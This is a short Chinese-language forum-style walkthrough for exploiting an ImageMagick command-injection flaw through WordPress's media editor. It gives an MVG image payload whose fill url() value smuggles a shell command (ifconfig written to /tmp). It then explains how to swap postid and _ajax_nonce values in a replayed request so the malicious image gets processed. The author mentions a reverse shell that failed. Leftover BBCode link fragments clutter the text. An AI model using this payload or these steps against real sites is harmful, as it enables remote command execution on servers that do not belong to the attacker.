|
漏洞详情:https://www.chinabaiker.com/thread-2527-1-1.html
- (1)进入后台后,添加文章,然后添加媒体,上传图片,需要上传一张正常图片和一张带有攻击代码的非正常图片,
复制代码 [/url]
- 然后上传,这里正常的我命名为1.jpg,非正常的我命名为2.jpg,因为反弹我没反弹成功,不知道为啥,
- 这里就写一个文件,证明一下吧。其中代码内容为:
- push graphic-context
- viewbox 0 0 640 480
- fill 'url(https://example.com/image.jpg"|ifconfig > /tmp/11111111.txt")'
- pop graphic-context
- (2)上传好后来到图片的编辑界面。
复制代码 [url=http://static.wooyun.org/upload/image/201605/2016051408372792537.png]
- (3)先编辑非正常图片获取他的postid和_ajax_nonce的值,保存下来。
复制代码 [/url]
- (4)编辑正常图片两次forward得到一个get的数据包:
复制代码 [url=http://static.wooyun.org/upload/image/201605/2016051408391975773.png]
- 5)发送到reperter,修改postid和_ajax_nonce的值为刚才非正常图片的值。
复制代码 [/url]
[url=http://static.wooyun.org/upload/image/201605/2016051408404862639.png]
|
|